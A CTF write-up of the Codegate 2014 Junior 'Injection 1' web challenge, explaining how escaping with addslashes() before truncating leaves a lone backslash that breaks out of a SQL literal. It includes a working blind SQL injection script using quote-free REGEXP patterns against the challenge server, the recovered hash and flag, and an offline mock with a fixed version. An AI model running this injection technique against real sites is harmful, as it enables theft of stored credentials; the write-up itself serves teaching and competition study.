
[Codegate 2014 Junior CTF] Injection 1 . 300 Point. WEB

Category: WarGame
Posted: 2014. 2. 12. 16:04


Two things in one: the bug that appears when a string is passed through addslashes() and then cut with substr(), plus a blind SQL injection that uses REGEXP.

When input is escaped first and truncated afterwards, a backslash placed right at the cut-off point gets separated from the backslash that addslashes() doubled it into, so a lone backslash ends up as the last character of id. Inside the query that backslash escapes the closing quote of the id literal, the literal runs on to the opening quote of pw, and whatever pw contains is parsed as SQL. From there the password hash is pulled out one character at a time with "pw REGEXP 0x..." (or char(...)): both forms need no quote characters, so addslashes() has nothing left to escape.



#!/usr/bin/python
# Python 2 (httplib). Blind SQL injection for Codegate 2014 Junior, Injection 1.
#
# The id parameter is 39 digits followed by a single backslash. The server runs
# addslashes() on it (the backslash becomes "\\") and then cuts the string to
# 40 characters, which leaves a lone backslash at the end. In the query that
# backslash escapes the closing quote of id, so the pw parameter is read as SQL:
#   http://58.229.183.25/eaf1c3a149e8c0dc599159c174655c2b/index.php?id=012345678901234567890123456789012345678\&pw=or(id+REGEXP+0x5E41)--+
# 0x5E41 is the MySQL hex-string form of "^A": no quotes are needed, so
# addslashes() cannot touch the pattern.
import httplib, urllib
import time


def print_hex1(instr):
    """Encode a string as a MySQL hex literal, e.g. "^A" -> 0x5E41."""
    convstr = "0x"
    for ch in instr:
        convstr += hex(ord(ch))[2:4]
    return convstr


def print_dec1(instr):
    """Alternative quote-free encoding: "^A" -> char(94, 65)."""
    convstr = "char("
    for i, ch in enumerate(instr):
        convstr += "%d" % ord(ch)
        if len(instr) - 1 != i:
            convstr += ", "
    convstr += ')'
    return convstr


headers = {"Content-type": "application/x-www-form-urlencoded",
           "Accept": "text/plain"}

# Characters recovered so far; "^" anchors the pattern to the start of pw.
# (This is the value left in the script after the run; start from "^" to
# extract from scratch.)
found = "^00c58a5ba17dafc6a67c88a88cff4f98"

for idx in range(1, 44):
    #for i in "abcdef1234567890":
    for i in '''qazwsxedcrfvtgbyhnujmikolpQAZWSXEDCRFVTGBYHNUJMIKOLP0123456789~!@#$%^&*()_+}{|":<>?/.,;'[]\=-`''':
        # Anchored form: the whole known prefix plus one candidate character.
        #blind = "id=012345678901234567890123456789012345678\&pw=or(pw+REGEXP+%s)--+" % (print_hex1("^"+found+i))
        # Shorter form actually used: only the last four known characters plus
        # the candidate, which keeps the hex literal short.
        blind = "id=012345678901234567890123456789012345678\&pw=or(pw+REGEXP+%s)--+" % (print_hex1(found[-4:]+i))
        params = ""
        #params = urllib.urlencode({"pw":"", "id":"", "no":blind})
        conn = httplib.HTTPConnection("58.229.183.25")
        #conn.set_debuglevel(10)
        print blind
        rq = "/eaf1c3a149e8c0dc599159c174655c2b/index.php?%s" % blind
        conn.request("GET", rq, params, headers)
        response = conn.getresponse()
        print response.status, response.reason
        data = response.read()
        # "Wrong" in the response means the injected REGEXP matched a row,
        # so the candidate character is correct.
        if data.find("Wrong") > 0:
            found += i
            print found
            conn.close()
            break
        conn.close()
    print idx, found
    time.sleep(1)
print found

# 5e7a6f6d626965242424 = ^zombie$$$
# 5e303063353861356261 = ^00c58a5ba
# password is ChA1N3D_EXPLOIT_IS_EVERYWHERE
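The following is an added, self-contained model of the technique and is not code from the original post or from the challenge. It shows, offline, why the truncated backslash breaks the query and how the REGEXP loop recovers the hash. Everything about the backend is an assumption: the 40-character truncation length, the query shape, the table layout and row, and "Wrong" as the text returned when a row matches. MySQL is stood in for by sqlite3: the assembled query is re-lexed with MySQL's backslash-escape rules and re-quoted for SQLite, a regexp() function is registered so the REGEXP operator works, and the pattern is sent as char(...) (the post's print_dec1() form) because SQLite has no MySQL-style 0x string literal. The extraction uses the anchored pattern that the post's script has commented out.

```python
import re
import sqlite3

ID_MAX_LEN = 40  # assumed: the challenge cut `id` to 40 chars after addslashes()
SQL = "SELECT id FROM users WHERE id='%s' AND pw='%s'"  # assumed query shape

def addslashes(s):
    # PHP addslashes(): a backslash in front of ' " \ and NUL
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))

def build_query(user_id, pw):
    # Vulnerable order: escape, THEN truncate. A cut between a backslash and
    # its doubled partner leaves a lone backslash that escapes the closing quote.
    return SQL % (addslashes(user_id)[:ID_MAX_LEN], addslashes(pw))

def build_query_fixed(user_id, pw):
    # Truncate first, escape last (a parameterised query is the real fix).
    return SQL % (addslashes(user_id[:ID_MAX_LEN]), addslashes(pw))

def mysql_tokens(sql):
    # Lex into ('code', text) / ('str', text) with MySQL single-quote rules:
    # backslash escapes the next char and "-- " ends the statement.
    tokens, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] == "'":
            j, buf = i + 1, []
            while j < n and sql[j] != "'":
                if sql[j] == "\\" and j + 1 < n:
                    buf.append(sql[j + 1])
                    j += 2
                else:
                    buf.append(sql[j])
                    j += 1
            tokens.append(("str", "".join(buf)))
            i = j + 1
        elif sql.startswith("-- ", i):
            break
        else:
            j = i + 1
            while j < n and sql[j] != "'" and not sql.startswith("-- ", j):
                j += 1
            tokens.append(("code", sql[i:j]))
            i = j
    return tokens

def to_sqlite(sql):
    # Re-emit with SQLite quoting so sqlite3 sees the boundaries MySQL would.
    return "".join("'%s'" % t.replace("'", "''") if k == "str" else t
                   for k, t in mysql_tokens(sql))

class MockServer:
    # Constructed stand-in for index.php: runs the assembled query and answers
    # with the text the post's script greps for ("Wrong" = a row matched).
    def __init__(self, rows, builder=build_query):
        self.builder = builder
        self.db = sqlite3.connect(":memory:")
        # SQLite evaluates `X REGEXP Y` as regexp(Y, X) once this is registered.
        self.db.create_function("regexp", 2,
                                lambda pat, val: 1 if re.search(pat, val) else 0)
        self.db.execute("CREATE TABLE users (id TEXT, pw TEXT)")
        self.db.executemany("INSERT INTO users VALUES (?, ?)", rows)

    def login(self, user_id, pw):
        try:
            row = self.db.execute(to_sqlite(self.builder(user_id, pw))).fetchone()
        except sqlite3.Error:
            return "Error"
        return "Wrong" if row else "No such user"

def sql_char(s):
    # Quote-free literal, the post's print_dec1() form: "^0" -> char(94,48).
    # MySQL also takes 0x5E30; SQLite has no string hex literal, hence char().
    return "char(%s)" % ",".join(str(ord(c)) for c in s)

def extract_pw(server, length, charset="0123456789abcdef"):
    # Pull pw out one char at a time with an anchored REGEXP on the known
    # prefix; the hash is hex, so the hex charset is enough.
    trunc_id = "0" * (ID_MAX_LEN - 1) + "\\"  # 39 filler chars + one backslash
    found = ""
    for _ in range(length):
        for c in charset:
            payload = "or(pw REGEXP %s)-- " % sql_char("^" + re.escape(found + c))
            if server.login(trunc_id, payload) == "Wrong":
                found += c
                break
        else:
            break  # no candidate matched: charset or length assumption is wrong
    return found

def demo():
    # Constructed row; the hash is the value the post recovered.
    rows = [("admin", "00c58a5ba17dafc6a67c88a88cff4f98")]
    vulnerable = extract_pw(MockServer(rows), 32)
    fixed = extract_pw(MockServer(rows, builder=build_query_fixed), 32)
    return vulnerable, fixed
```

demo() returns the full 32-character hash from the vulnerable builder and an empty string from the fixed one: with truncation done before escaping, mysql_tokens() shows the injected text staying inside the pw string literal, and the REGEXP never runs. Printing mysql_tokens(build_query("0" * 39 + "\\", "or(1=1)-- ")) is the quickest way to see the boundary shift: the id literal swallows " AND pw=" and the payload comes out as a code token.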

